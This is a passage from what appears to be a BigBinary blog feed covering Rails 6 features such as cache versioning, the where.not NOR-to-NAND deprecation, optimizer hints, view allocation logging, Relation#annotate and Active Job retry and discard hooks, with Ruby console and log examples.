&gt;&gt; posts.cache_key
=&gt; &quot;posts/query-00644b6a00f2ed4b925407d06501c8fb&quot;
&gt;&gt; posts.cache_version
=&gt; &quot;3-20190522172326885804&quot;</code></pre><p>Cache versioning works similarly for <code>ActiveRecord::Relation</code> as for <code>ActiveRecord::Base</code>.</p><p>In the case of <code>ActiveRecord::Relation</code>, if the number of records changes and/or record(s) are updated, then the same <code>cache_key</code> is written to the cache store with a new <code>cache_version</code> and the updated records.</p><h2>Conclusion</h2><p>Previously, cache invalidation had to be done manually, either by deleting the cache or by setting a cache expiry duration. Cache versioning invalidates stale data automatically and keeps only the latest copy of the data, saving drastically on storage and performance.</p><p>Check out the <a href="https://github.com/rails/rails/pull/29092">pull request</a> and <a href="https://github.com/rails/rails/commit/4f2ac80d4cdb01c4d3c1765637bed76cc91c1e35">commit</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 deprecates where.not as NOR & Rails 6.1 as NAND]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-deprecates-where-not-working-as-nor-and-will-change-to-nand-in-rails-6-1"/>
      <updated>2019-07-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-deprecates-where-not-working-as-nor-and-will-change-to-nand-in-rails-6-1</id>
       <content type="html"><![CDATA[<p>A notable deprecation warning has been added in Rails 6 when using <code>where.not</code> with multiple attributes.</p><p>Before Rails 6, if we use <code>where.not</code> with multiple attributes, it applies logical <em>NOR (NOT(A) AND NOT(B))</em> in the <em>WHERE</em> clause of the query. This does not always work as expected.</p><p>Let's look at an example to understand this better.</p><p>We have a <code>Post</code> model with a polymorphic association.</p><h5>Rails 5.2</h5><pre><code class="language-ruby">&gt;&gt; Post.all
=&gt; #&lt;ActiveRecord::Relation [#&lt;Post id: 1, title: &quot;First Post&quot;, source_type: &quot;Feed&quot;, source_id: 100&gt;, #&lt;Post id: 2, title: &quot;Second Post&quot;, source_type: &quot;Feed&quot;, source_id: 101&gt;]&gt;
&gt;&gt; Post.where(source_type: &quot;Feed&quot;, source_id: 100)
=&gt; #&lt;ActiveRecord::Relation [#&lt;Post id: 1, title: &quot;First Post&quot;, source_type: &quot;Feed&quot;, source_id: 100&gt;]&gt;
&gt;&gt; Post.where.not(source_type: &quot;Feed&quot;, source_id: 100)
=&gt; #&lt;ActiveRecord::Relation []&gt;</code></pre><p>In the last query, we expect ActiveRecord to fetch one record.</p><p>Let's check the SQL generated for the above case.</p><pre><code class="language-ruby">&gt;&gt; Post.where.not(source_type: &quot;Feed&quot;, source_id: 100).to_sql
=&gt; SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE &quot;posts&quot;.&quot;source_type&quot; != 'Feed' AND &quot;posts&quot;.&quot;source_id&quot; != 100</code></pre><p><code>where.not</code> applies <em>AND</em> to the negation of <code>source_type</code> and <code>source_id</code>, and fails to fetch the expected records.</p><p>In such cases, the correct implementation of <code>where.not</code> would be logical <em>NAND</em> <em>(NOT(A) OR NOT(B))</em>.</p><p>Let us query the <code>posts</code> table using NAND this time.</p><pre><code class="language-ruby">&gt;&gt; Post.where(&quot;source_type != 'Feed' OR source_id != 100&quot;)
SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE (source_type != 'Feed' OR source_id != 100)
=&gt; #&lt;ActiveRecord::Relation [#&lt;Post id: 2, title: &quot;Second Post&quot;, source_type: &quot;Feed&quot;, source_id: 101&gt;]&gt;</code></pre><p>The above query works as expected and returns one record. Rails 6.1 will change <code>where.not</code> to work as NAND, similar to the above query.</p><h5>Rails 6.0.0.rc1</h5><pre><code class="language-ruby">&gt;&gt; Post.where.not(source_type: &quot;Feed&quot;, source_id: 100)
DEPRECATION WARNING: NOT conditions will no longer behave as NOR in Rails 6.1. To continue using NOR conditions, NOT each conditions manually (`.where.not(:source_type =&gt; ...).where.not(:source_id =&gt; ...)`). (called from irb_binding at (irb):1)
=&gt; #&lt;ActiveRecord::Relation []&gt;</code></pre><p>As the deprecation warning mentions, if we wish to keep the <em>NOR</em> behavior with multiple attributes, we can chain multiple <code>where.not</code> calls, each with a single predicate.</p><pre><code class="language-ruby">&gt;&gt; Post.where.not(source_type: &quot;Feed&quot;).where.not(source_id: 100)</code></pre><p>Here's the relevant <a href="https://github.com/rails/rails/issues/31209">discussion</a> and <a href="https://github.com/rails/rails/pull/36029">pull request</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds support for Optimizer Hints]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-supports-optimizer-hints"/>
      <updated>2019-07-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-supports-optimizer-hints</id>
       <content type="html"><![CDATA[<p>Rails 6 has added support for providing optimizer hints.</p><h2>What are Optimizer Hints?</h2><p>Many relational database management systems (RDBMS) have a query optimizer. The job of the query optimizer is to determine the most efficient plan to execute a given SQL query. The query optimizer has to consider all possible query execution plans before it can determine which plan is optimal for executing the given SQL query, and then compile and execute that query.</p><p>An optimal plan is chosen by the query optimizer by calculating the cost of each possible plan. Typically, when the number of tables referenced in a join query increases, the time spent in query optimization grows exponentially, which often affects the system's performance. The fewer the execution plans the query optimizer needs to evaluate, the less time is spent in compiling and executing the query.</p><p>As application designers, we might have more context about the data stored in our database. With that contextual knowledge, we might be able to choose a more efficient execution plan than the query optimizer.</p><p>This is where optimizer hints, or optimizer guidelines, come into the picture.</p><p>Optimizer hints allow us to steer the query optimizer toward a certain query execution plan based on specific criteria. In other words, we can hint the optimizer to use or ignore certain optimization plans.</p><p>Usually, optimizer hints should be provided only when executing a complex query involving multiple table joins.</p><p>Note that optimizer hints only affect an individual SQL statement. To alter the optimization strategies at the global level, there are different mechanisms supported by different databases. 
Optimizer hints provide finer control than those other mechanisms, which alter optimization plans by other means.</p><p>Optimizer hints are supported by many databases such as <a href="https://dev.mysql.com/doc/refman/8.0/en/optimizer-hints.html">MySQL</a>, <a href="https://pghintplan.osdn.jp/pg_hint_plan.html">PostgreSQL with the help of the <code>pg_hint_plan</code> extension</a>, <a href="https://docs.oracle.com/en/database/oracle/oracle-database/12.2/tgsql/influencing-the-optimizer.html">Oracle</a>, <a href="https://docs.microsoft.com/en-us/sql/t-sql/queries/hints-transact-sql-query?view=sql-server-2017">MS SQL</a>, <a href="https://www.ibm.com/support/knowledgecenter/en/SSEPGG_11.1.0/com.ibm.db2.luw.admin.perf.doc/doc/c0070117.html">IBM DB2</a>, etc., with varying syntax and options.</p><h2>Optimizer Hints in Rails 6</h2><p>Before Rails 6, we had to execute a raw SQL query to use optimizer hints.</p><pre><code class="language-ruby">query = &quot;SELECT
           /*+ JOIN_ORDER(articles, users) MAX_EXECUTION_TIME(60000) */
           articles.*
         FROM articles
         INNER JOIN users
         ON users.id = articles.user_id
         WHERE (published_at &gt; '2019-02-17 13:15:44')
        &quot;.squish

ActiveRecord::Base.connection.execute(query)</code></pre><p>In the above query, we provided two optimizer hints to MySQL.</p><pre><code class="language-plaintext">/*+ HINT_HERE ANOTHER_HINT_HERE ... 
*/</code></pre><p>Another approach to using optimizer hints prior to Rails 6 is to <a href="https://gist.github.com/kamipo/4c8539f0ce4acf85075cf5a6b0d9712e">use a monkey patch like this</a>.</p><p>In Rails 6, using optimizer hints is easier.</p><p>The same example looks like this in Rails 6.</p><pre><code class="language-ruby">Article
  .joins(:user)
  .where(&quot;published_at &gt; ?&quot;, 2.months.ago)
  .optimizer_hints(
    &quot;JOIN_ORDER(articles, users)&quot;,
    &quot;MAX_EXECUTION_TIME(60000)&quot;
  )</code></pre><p>This produces the same SQL query as above, but the result is of type <code>ActiveRecord::Relation</code>.</p><p>In PostgreSQL (using the <code>pg_hint_plan</code> extension), the optimizer hints have a different syntax.</p><pre><code class="language-ruby">Article
  .joins(:user)
  .where(&quot;published_at &gt; ?&quot;, 2.months.ago)
  .optimizer_hints(&quot;Leading(articles users)&quot;, &quot;SeqScan(articles)&quot;)</code></pre><p>Please check out the documentation of each database separately to learn the support and syntax of optimizer hints.</p><p>To learn more, please <a href="https://github.com/rails/rails/pull/35615">check out this PR</a> which introduced the <code>#optimizer_hints</code> method in Rails 6.</p><h2>Bonus example: Using optimizer hints to speed up a slow SQL statement in MySQL</h2><p>Consider that we have an <code>articles</code> table with some indexes.</p><pre><code class="language-ruby">class CreateArticles &lt; ActiveRecord::Migration[6.0]
  def change
    create_table :articles do |t|
      t.string :title, null: false
      t.string :slug, null: false
      t.references :user
      t.datetime :published_at
      t.text :description
      t.timestamps
      t.index :slug, unique: true
      t.index [:published_at]
      t.index [:slug, :user_id]
      t.index [:published_at, :user_id]
      t.index [:title, :slug]
    end
  end
end</code></pre><p>Let's try to fetch all the articles which have been published in the last 2 months.</p><pre><code 
class="language-ruby">&gt;&gt; Article.joins(:user).where(&quot;published_at &gt; ?&quot;, 2.months.ago)
# Article Load (10.5ms)  SELECT `articles`.* FROM `articles` INNER JOIN `users` ON `users`.`id` = `articles`.`user_id` WHERE (published_at &gt; '2019-02-17 11:38:18.647296')
=&gt; #&lt;ActiveRecord::Relation [#&lt;Article id: 20, title: &quot;Article 20&quot;, slug: &quot;article-20&quot;, user_id: 1, ...]&gt;</code></pre><p>Let's use <code>EXPLAIN</code> to investigate why it takes 10.5ms to execute this query.</p><pre><code class="language-ruby">&gt;&gt; Article.joins(:user).where(&quot;published_at &gt; ?&quot;, 2.months.ago).explain
# Article Load (13.9ms)  SELECT `articles`.* FROM `articles` INNER JOIN `users` ON `users`.`id` = `articles`.`user_id` WHERE (published_at &gt; '2019-02-17 11:39:05.380577')
=&gt; # EXPLAIN for: SELECT `articles`.* FROM `articles` INNER JOIN `users` ON `users`.`id` = `articles`.`user_id` WHERE (published_at &gt; '2019-02-17 11:39:05.380577')
# +--------+----------+----------------+-----------+------+----------+-------+
# | select |   table  | possible_keys  | key       | rows | filtered | Extra |
# | _type  |          |                |           |      |          |       |
# +--------+----------+----------------+-----------+------+----------+-------+
# | SIMPLE |   users  | PRIMARY        | PRIMARY   | 2    | 100.0    | Using |
# |        |          |                |           |      |          | index |
# +--------+----------+----------------+-----------+------+----------+-------+
# | SIMPLE | articles | index          | index     | 9866 | 10.0     | Using |
# |        |          | _articles      | _articles |      |          | where |
# |        |          | _on_user_id,   | _on       |      |          |       |
# |        |          | index          | _user_id  |      |          |       |
# |        |          | _articles      |           |      |          |       |
# |        |          | _on            |           |      |          |       |
# |        |          | _published_at, |           |      |          |       |
# |        |          | index          |           |      |          |       |
# |        |          | _articles      |           |      |          |       |
# |        |          | _on            |           |      |          |       |
# |        |          | _published_at  |           |      |          |       |
# |        |          | _and_user_id   |           |      |          |       |
# +--------+----------+----------------+-----------+------+----------+-------+</code></pre><p>According to the above table, it appears that the query optimizer is considering the <code>users</code> table first and then the <code>articles</code> table.</p><p>The <code>rows</code> column indicates the estimated number of rows the query optimizer must examine to execute the query.</p><p>The <a href="https://dev.mysql.com/doc/refman/8.0/en/explain-output.html#explain_filtered"><code>filtered</code></a> column indicates an estimated percentage of table rows that will be filtered by the table condition.</p><p>The formula <code>rows x filtered</code> gives the number of rows that will be joined with the following table.</p><p>Also,</p><ul><li>For the <code>users</code> table, the number of rows to be joined with the following table is <code>2 x 100% = 2</code>,</li><li>For the <code>articles</code> table, the number of rows to be joined with the following table is <code>9866 x 10% = 986.6</code>.</li></ul><p>Since the <code>articles</code> table contains many records which reference very few records from the <code>users</code> table, it would be better to consider the <code>articles</code> table first and then the <code>users</code> table.</p><p>We can hint MySQL to consider the <code>articles</code> table first as follows.</p><pre><code class="language-ruby">&gt;&gt; Article.joins(:user).where(&quot;published_at &gt; ?&quot;, 2.months.ago).optimizer_hints(&quot;JOIN_ORDER(articles, users)&quot;)
# Article Load (2.2ms)  SELECT `articles`.* FROM `articles` INNER JOIN `users` ON `users`.`id` = `articles`.`user_id` WHERE (published_at &gt; '2019-02-17 11:54:06.230651')
=&gt; #&lt;ActiveRecord::Relation [#&lt;Article id: 20, title: &quot;Article 20&quot;, slug: &quot;article-20&quot;, user_id: 1, ...]&gt;</code></pre><p>Note that it now took 2.2ms to fetch the same records after providing the <code>JOIN_ORDER(articles, users)</code> optimization hint.</p><p>Let's use <code>EXPLAIN</code> to see what changed with the <code>JOIN_ORDER(articles, users)</code> optimization hint.</p><pre><code class="language-ruby">&gt;&gt; Article.joins(:user).where(&quot;published_at &gt; ?&quot;, 2.months.ago).optimizer_hints(&quot;JOIN_ORDER(articles, users)&quot;).explain
# Article Load (4.1ms)  SELECT /*+ JOIN_ORDER(articles, users) */ `articles`.* FROM `articles` INNER JOIN `users` ON `users`.`id` = `articles`.`user_id` WHERE (published_at &gt; '2019-02-17 11:55:24.335152')
=&gt; # EXPLAIN for: SELECT /*+ JOIN_ORDER(articles, users) */ `articles`.* FROM `articles` INNER JOIN `users` ON `users`.`id` = `articles`.`user_id` WHERE (published_at &gt; '2019-02-17 11:55:24.335152')
# +--------+----------+----------------+-----------+------+----------+--------+
# | select |   table  | possible_keys  | key       | rows | filtered | Extra  |
# | _type  |          |                |           |      |          |        |
# +--------+----------+----------------+-----------+------+----------+--------+
# | SIMPLE | articles | index          | index     | 769  | 100.0    | Using  |
# |        |          | _articles      | _articles |      |          | index  |
# |        |          | _on_user_id,   | _on       |      |          | condi  |
# |        |          | index          | _publish  |      |          | tion;  |
# |        |          | _articles      | ed_at,    |      |          | Using  |
# |        |          | _on            |           |      |          | where  |
# |        |          | _published_at, |           |      |          |        |
# |        |          | index          |           |      |          |        |
# |        |          | _articles      |           |      |          |        |
# |        |          | _on            |           |      |          |        |
# |        |          | _published_at  |           |      |          |        |
# |        |          | _and_user_id   |           |      |          |        |
# +--------+----------+----------------+-----------+------+----------+--------+
# | SIMPLE | users    | PRIMARY        | PRIMARY   | 2    | 100.0    | Using  |
# |        |          |                |           |      |          | index  |
# +--------+----------+----------------+-----------+------+----------+--------+</code></pre><p>The result of the <code>EXPLAIN</code> query shows that the <code>articles</code> table was considered first and then the <code>users</code> table, as expected. We can also see that the <code>index_articles_on_published_at</code> index key was chosen from the possible keys to execute the given query. The <code>filtered</code> column for both tables shows 100%, which means no filtering of rows occurred.</p><p>We hope this example helps in understanding how to use the <code>#explain</code> and <code>#optimizer_hints</code> methods to investigate and debug performance issues, and then fix them.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 reports object allocations while rendering]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-reports-object-allocations-made-while-rendering-view-templates"/>
      <updated>2019-07-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-reports-object-allocations-made-while-rendering-view-templates</id>
       <content type="html"><![CDATA[<p>Recently, Rails 6 <a href="https://github.com/rails/rails/pull/33449">added the <code>allocations</code> feature</a> to <code>ActiveSupport::Notifications::Event</code>. Using this feature, an event subscriber can see how many objects were allocated between the event's start time and end time. We have written about this feature in detail <a href="https://blog.bigbinary.com/2019/04/24/rails-6-adds-cpu-time-idle-time-and-allocations-to-activesupport-notifications-event.html">here</a>.</p><p>Taking advantage of this feature, Rails 6 now reports the allocations made while rendering a view template, a partial, and a collection.</p><pre><code class="language-plaintext">Started GET &quot;/articles&quot; for ::1 at 2019-04-15 17:24:09 +0530
Processing by ArticlesController#index as HTML
Rendering articles/index.html.erb within layouts/application
Rendered shared/_ad_banner.html.erb (Duration: 0.1ms | Allocations: 6)
Article Load (1.3ms) SELECT &quot;articles&quot;.* FROM &quot;articles&quot; app/views/articles/index.html.erb:5
Rendered collection of articles/_article.html.erb [100 times] (Duration: 6.1ms | Allocations: 805)
Rendered articles/index.html.erb within layouts/application (Duration: 17.6ms | Allocations: 3901)
Completed 200 OK in 86ms (Views: 83.6ms | ActiveRecord: 1.3ms | Allocations: 29347)</code></pre><p>Notice the <code>Allocations:</code> information in the above logs.</p><p>We can see that</p><ul><li>6 objects were allocated while rendering the <code>shared/_ad_banner.html.erb</code> view partial,</li><li>805 objects were allocated while rendering a collection of 100 <code>articles/_article.html.erb</code> view partials,</li><li>and 3901 objects were allocated while rendering the <code>articles/index.html.erb</code> view template.</li></ul><p>We can use this information to understand how much time was spent while rendering a view template and how many objects were allocated in the process' memory between the time when that view 
template had started rendering and the time when that view template had finished rendering.</p><p>To learn more about this feature, please check <a href="https://github.com/rails/rails/pull/34136">rails/rails#34136</a>.</p><p>Note that we can also collect this information by subscribing to <a href="https://edgeguides.rubyonrails.org/active_support_instrumentation.html#action-view">Action View hooks</a>.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe /^render_.+\.action_view$/ do |event|
  views_path = Rails.root.join(&quot;app/views/&quot;).to_s
  template_identifier = event.payload[:identifier]
  template_name = template_identifier.sub(views_path, &quot;&quot;)
  message = &quot;[#{event.name}] #{template_name} (Allocations: #{event.allocations})&quot;
  ViewAllocationsLogger.log(message)
end</code></pre><p>This should log something like this.</p><pre><code class="language-plaintext">[render_partial.action_view] shared/_ad_banner.html.erb (Allocations: 43)
[render_collection.action_view] articles/_article.html.erb (Allocations: 842)
[render_template.action_view] articles/index.html.erb (Allocations: 4108)</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveRecord::Relation#annotate]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-annotate-to-activerecord-relation-queries"/>
      <updated>2019-07-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-annotate-to-activerecord-relation-queries</id>
       <content type="html"><![CDATA[<p>Rails 6 has added <code>ActiveRecord::Relation#annotate</code> to allow adding comments to the SQL queries generated by an <code>ActiveRecord::Relation</code> instance.</p><p>Here is how it can be used.</p><pre><code class="language-ruby">&gt;&gt; User.annotate(&quot;User whose name starts with 'A'&quot;).where(&quot;name LIKE ?&quot;, &quot;A%&quot;)
SELECT &quot;users&quot;.* FROM &quot;users&quot;
WHERE (name LIKE 'A%')
/* User whose name starts with 'A' */
LIMIT ?  [[&quot;LIMIT&quot;, 11]]</code></pre><p><code>ActiveRecord::Relation#annotate</code> allows adding multiple annotations on a query.</p><pre><code class="language-ruby">&gt;&gt; bigbinary = Organization.find_by!(name: &quot;BigBinary&quot;)
&gt;&gt; User.annotate(&quot;User whose name starts with 'A'&quot;)
       .annotate(&quot;AND belongs to BigBinary organization&quot;)
       .where(&quot;name LIKE ?&quot;, &quot;A%&quot;)
       .where(organization: bigbinary)
SELECT &quot;users&quot;.* FROM &quot;users&quot;
WHERE (name LIKE 'A%') AND &quot;users&quot;.&quot;organization_id&quot; = ?
/* User whose name starts with 'A' */
/* AND belongs to BigBinary organization */
LIMIT ?  [[&quot;organization_id&quot;, 1], [&quot;LIMIT&quot;, 11]]</code></pre><p>Also, <code>ActiveRecord::Relation#annotate</code> allows annotating scopes and model associations.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base
  scope :active, -&gt; { where(status: 'active').annotate(&quot;Active users&quot;) }
end

&gt;&gt; User.active
SELECT &quot;users&quot;.* FROM &quot;users&quot;
/* Active users */
LIMIT ?  [[&quot;LIMIT&quot;, 11]]</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/35617">pull request</a> for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds hook to Active Job for retry & discard]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-hooks-to-activejob-around-retries-and-discards"/>
      <updated>2019-07-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-hooks-to-activejob-around-retries-and-discards</id>
       <content type="html"><![CDATA[<h2>Before Rails 6</h2><p>Before Rails 6, we had to provide a custom block to perform custom logging and monitoring around retries and discards of jobs defined using the Active Job framework.</p><pre><code class="language-ruby">class Container::DeleteJob &lt; ActiveJob::Base
  retry_on Timeout::Error, wait: 2.seconds, attempts: 3 do |job, error|
    message = &quot;Stopped retrying #{job.class} (JID #{job.job_id})
               with #{job.arguments.join(', ')} due to
               '#{error.class} - #{error.message}'.
               This job was retried for #{job.executions} times.&quot;.squish
    BackgroundJob::ErrorLogger.log(message)
  end

  discard_on Container::NotFoundError do |job, error|
    message = &quot;Discarded #{job.class} (JID #{job.job_id})
               with #{job.arguments.join(', ')} due to
               '#{error.class} - #{error.message}' error.&quot;.squish
    BackgroundJob::ErrorLogger.log(message)
  end

  def perform(container_id)
    Container::DeleteService.new(container_id).process
    # Will raise Container::NotFoundError
    # if no container is found with 'container_id'.
    # Might raise Timeout::Error when the remote API is not responding.
  end
end</code></pre><p>Notice the custom blocks provided to the <code>retry_on</code> and <code>discard_on</code> methods of an individual job in the above example.</p><p>Extracting such custom logic into a base class or a 3rd-party gem is possible, but it would be non-standard and a bit difficult.</p><p>An alternative approach is to <a href="https://guides.rubyonrails.org/active_support_instrumentation.html#subscribing-to-an-event">subscribe</a> to the hooks instrumented using the Active Support Instrumentation API, which is a standard and recommended way. Versions prior to Rails 6 already instrument <a href="https://guides.rubyonrails.org/v5.2/active_support_instrumentation.html#active-job">some hooks</a> such as <code>enqueue_at.active_job</code>, <code>enqueue.active_job</code>, <code>perform_start.active_job</code>, and <code>perform.active_job</code>. 
Unfortunately, no hook is instrumented around retries and discards of an Active Job prior to Rails 6.</p><h2>Rails 6</h2><p>Rails 6 has introduced hooks to Active Job <a href="https://github.com/rails/rails/pull/33751">around retries and discards</a>, to which one can easily subscribe using the Active Support Instrumentation API to perform custom logging and monitoring or to collect any custom information.</p><p>The newly introduced hooks are <code>enqueue_retry.active_job</code>, <code>retry_stopped.active_job</code>, and <code>discard.active_job</code>.</p><p>Let's discuss each of these hooks in detail.</p><p>Note that whenever we say <code>a job</code>, it means a job of type <code>ActiveJob</code>.</p><h5><code>enqueue_retry.active_job</code></h5><p>The <code>enqueue_retry.active_job</code> hook is instrumented when a job is <a href="https://github.com/rails/rails/blob/2ab3751781e34ca4a8d477ba53ff307ae9884b0d/activejob/lib/active_job/exceptions.rb#L119-L123">enqueued to retry again</a> due to the occurrence of an exception which is configured using the <code>retry_on</code> method in the job's definition. This hook is triggered only when the above condition is satisfied and the number of executions of the job is less than the number of <code>attempts</code> defined using the <code>retry_on</code> method. 
The number of <code>attempts</code> is by default set to 5 if not defined explicitly.</p><p>This is how we would subscribe to this hook and perform custom logging in our Rails application.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe &quot;enqueue_retry.active_job&quot; do |*args|
  event = ActiveSupport::Notifications::Event.new *args
  payload = event.payload
  job = payload[:job]
  error = payload[:error]

  message = &quot;#{job.class} (JID #{job.job_id})
             with arguments #{job.arguments.join(', ')}
             will be retried again in #{payload[:wait]}s
             due to error '#{error.class} - #{error.message}'.
             It is executed #{job.executions} times so far.&quot;.squish

  BackgroundJob::Logger.log(message)
end</code></pre><p>Note that <code>BackgroundJob::Logger</code> above is our custom logger. If we want, we can add any other logic instead.</p><p>We will change the definition of the <code>Container::DeleteJob</code> job as below.</p><pre><code class="language-ruby">class Container::DeleteJob &lt; ActiveJob::Base
  retry_on Timeout::Error, wait: 2.seconds, attempts: 3

  def perform(container_id)
    Container::DeleteService.new(container_id).process
    # Will raise Timeout::Error when the remote API is not responding.
  end
end</code></pre><p>Let's enqueue this job.</p><pre><code class="language-ruby">Container::DeleteJob.perform_now(&quot;container-1234&quot;)</code></pre><p>Assume that this job keeps throwing a <code>Timeout::Error</code> exception due to a network issue. The job will be retried twice, since it is configured to retry when a <code>Timeout::Error</code> exception occurs, up to a maximum of 3 attempts. 
While retrying this job, Active Job will instrument the <code>enqueue_retry.active_job</code> hook along with the necessary job payload.</p><p>Since we have already subscribed to this hook, our subscriber would log something like this with the help of <code>BackgroundJob::Logger.log</code>.</p><pre><code class="language-plaintext">Container::DeleteJob (JID 770f4f2a-daa7-4c1e-be51-24adc04b4cb2) with arguments container-1234 will be retried again in 2s due to error 'Timeout::Error - Couldn't establish connection to cluster within 10s'. It is executed 1 times so far.
Container::DeleteJob (JID 770f4f2a-daa7-4c1e-be51-24adc04b4cb2) with arguments container-1234 will be retried again in 2s due to error 'Timeout::Error - Couldn't establish connection to cluster within 10s'. It is executed 2 times so far.</code></pre><h5><code>retry_stopped.active_job</code></h5><p>The <code>retry_stopped.active_job</code> hook is triggered when a job has been retried <a href="https://github.com/rails/rails/blob/2ab3751781e34ca4a8d477ba53ff307ae9884b0d/activejob/lib/active_job/exceptions.rb#L59-L66">up to the available number of <code>attempts</code></a>.</p><p>Let's see how this hook is triggered.</p><p>Along with the subscription for the <code>enqueue_retry.active_job</code> hook, let's subscribe to the <code>retry_stopped.active_job</code> hook, too.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe &quot;retry_stopped.active_job&quot; do |*args|
  event = ActiveSupport::Notifications::Event.new(*args)
  payload = event.payload
  job = payload[:job]
  error = payload[:error]

  message = &quot;Stopped processing #{job.class} (JID #{job.job_id})
             further with arguments #{job.arguments.join(', ')}
             since it failed due to '#{error.class} - #{error.message}' error
             which reoccurred #{job.executions} times.&quot;.squish

  BackgroundJob::Logger.log(message)
end</code></pre><p>Let's keep the <code>Container::DeleteJob</code> job's definition unchanged and run it again.</p><pre><code
class="language-ruby">Container::DeleteJob.perform_now(&quot;container-1234&quot;)</code></pre><p>We will assume that the job keeps throwing a <code>Timeout::Error</code> exception due to a network issue.</p><p>In the logs recorded using <code>BackgroundJob::Logger.log</code>, we should see something like this.</p><pre><code class="language-plaintext">Container::DeleteJob (JID 770f4f2a-daa7-4c1e-be51-24adc04b4cb2) with arguments container-1234 will be retried again in 2s due to error 'Timeout::Error - Couldn't establish connection to cluster within 10s'. It is executed 1 times so far.
Container::DeleteJob (JID 770f4f2a-daa7-4c1e-be51-24adc04b4cb2) with arguments container-1234 will be retried again in 2s due to error 'Timeout::Error - Couldn't establish connection to cluster within 10s'. It is executed 2 times so far.
Stopped processing Container::DeleteJob (JID 770f4f2a-daa7-4c1e-be51-24adc04b4cb2) further with arguments container-1234 since it failed due to 'Timeout::Error - Couldn't establish connection to cluster within 10s' error which reoccurred 3 times.</code></pre><p>Notice the last entry in the logs above and its order.</p><h5><code>discard.active_job</code></h5><p>The <code>discard.active_job</code> hook is triggered when a job's further execution is discarded due to the occurrence of an exception that is configured using the <code>discard_on</code> method.</p><p>To see how this hook is triggered, we will subscribe to the <code>discard.active_job</code> hook.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe &quot;discard.active_job&quot; do |*args|
  event = ActiveSupport::Notifications::Event.new(*args)
  payload = event.payload
  job = payload[:job]
  error = payload[:error]

  message = &quot;Discarded #{job.class} (JID #{job.job_id})
             with arguments #{job.arguments.join(', ')}
             due to '#{error.class} - #{error.message}' error.&quot;.squish

  BackgroundJob::Logger.log(message)
end</code></pre><p>We will configure our <code>Container::DeleteJob</code> job to
be discarded when a <code>Container::NotFoundError</code> exception occurs while executing the job.</p><pre><code class="language-ruby">class Container::DeleteJob &lt; ActiveJob::Base
  discard_on Container::NotFoundError
  retry_on Timeout::Error, wait: 2.seconds, attempts: 3

  def perform(container_id)
    # Will raise Container::NotFoundError
    # if no container is found with 'container_id'.
    # Will raise Timeout::Error when the remote API is not responding.
    Container::DeleteService.new(container_id).process
  end
end</code></pre><p>Let's run this job and assume that it throws a <code>Container::NotFoundError</code> exception.</p><pre><code class="language-ruby">Container::DeleteJob.perform_now(&quot;unknown-container-9876&quot;)</code></pre><p>We should see the following in the logs recorded by <code>BackgroundJob::Logger.log</code>.</p><pre><code class="language-plaintext">Discarded Container::DeleteJob (JID e9b1cb5c-6d2d-49ae-b1d7-fef44f09ab8d) with arguments unknown-container-9876 due to 'Container::NotFoundError - Container 'unknown-container-9876' was not found' error.</code></pre><h2>Notes</h2><ol><li><p>These new hooks are also instrumented for jobs enqueued using the <code>perform_later</code> method, since both <code>perform_now</code> and <code>perform_later</code> call the <code>perform</code> method under the hood.</p></li><li><p>Active Job already subscribes to these hooks and writes them using <a href="https://github.com/rails/rails/blob/2ab3751781e34ca4a8d477ba53ff307ae9884b0d/activejob/lib/active_job/logging.rb#L91-L121">Rails' default logger</a>.</p></li><li><p>If a block is provided to the <code>retry_on</code> or <code>discard_on</code> methods, then the applicable hook is instrumented first and then the given block is yielded.</p></li></ol>]]></content>
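The hooks above all ride on the publish/subscribe mechanism of ActiveSupport::Notifications. As a rough illustration of that pattern in plain Ruby (not Rails' actual implementation; the `TinyNotifications` module and the payload keys below are invented for this sketch):

```ruby
# Plain-Ruby sketch of the publish/subscribe pattern behind
# ActiveSupport::Notifications (illustrative only; TinyNotifications and
# the payload keys are invented, not the Rails API).
module TinyNotifications
  @subscribers = Hash.new { |hash, key| hash[key] = [] }

  # Register a callback for a named event.
  def self.subscribe(event, &block)
    @subscribers[event] << block
  end

  # Fire a named event, handing the payload to every subscriber.
  def self.instrument(event, payload = {})
    @subscribers[event].each { |subscriber| subscriber.call(payload) }
  end
end

logged = []
TinyNotifications.subscribe("enqueue_retry.active_job") do |payload|
  logged << "#{payload[:job]} will be retried in #{payload[:wait]}s due to #{payload[:error]}"
end

# A job framework would instrument the event when scheduling a retry:
TinyNotifications.instrument("enqueue_retry.active_job",
                             job: "Container::DeleteJob", wait: 2, error: "Timeout::Error")

logged.first
# => "Container::DeleteJob will be retried in 2s due to Timeout::Error"
```

In the real API, subscribing decouples logging and monitoring from the job code itself, which is exactly what the `BackgroundJob::Logger` subscribers above do.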
    </entry><entry>
       <title><![CDATA[Rails 6 adds support for Multi Environment credentials]]></title>
       <author><name>Berin Larson</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-support-for-multi-environment-credentials"/>
      <updated>2019-07-03T12:00:00+00:00</updated>
